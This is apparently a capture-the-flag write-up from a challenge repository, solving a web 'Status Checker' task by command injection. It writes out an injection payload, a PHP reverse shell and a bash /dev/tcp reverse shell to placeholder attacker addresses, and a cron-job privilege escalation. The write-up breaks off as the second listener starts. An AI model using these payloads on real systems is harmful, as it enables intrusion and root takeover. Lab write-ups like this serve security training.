kqjy/GiTxHextech-Challenge-Repo
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9d04ea3b34234aed707c1f383d666a4f719493d6
GiTxHextech-Challenge-Repo/challenges/web/Status Checker/writeup.md
Twi 9d04ea3b34 Update writeup.md
2024-04-18 15:27:04 +08:00

2.2 KiB
Raw Blame History

We are given a site where we can check the status of websites.

Entering a valid URL such as https://google.com will return us the HTTP status code as seen in the following screenshot.

!wimg-1

Entering a semi-colon (;) will break the command. We can try to use the payload ; whoami and we are returned www-data as our user as seen in the following screenshot.

!wimg-2

We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be nc -nlvp 45101 as seen in the following screenshot.

!wimg-3

Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address.

; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");'

Input the above payload into the input box as seen in the following screenshot.

!wimg-4

Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot.

!wimg-5

We can spawn an interactive shell using the command script -qc /bin/bash /dev/null. Once done, we can explore the system. Navigating to the /var/www/ directory and we can see 2 files.

The files are:

  • backup.sh - Owned by the root user.
  • my-script.sh - Owned by the www-data user.

!wimg-6

We can see that the backup.sh file runs the my-script.sh file as sudo, effectively running as the root user.

Using the command cat /etc/crontab, we can see that there is a cronjob that runs the backup.sh file every minute. We can abuse this by changing the contents of the my-script.sh file.

As we own the my-script.sh file, we can modify it to spawn a reverse shell using the following commands:

echo '#/bin/bash' > my-script.sh
echo 'bash -i >& /dev/tcp/YOUR-IP-HERE/PORT-HERE 0>&1' >> my-script.sh

Replace YOUR-IP-HERE with your IP address and PORT-HERE with your desired port number. Once done, start another netcat listener on the port that was chosen in the above command. In this example, it will be 45102 as seen in the following screenshot.

!wimg-7

Reference in New Issue View Git Blame Copy Permalink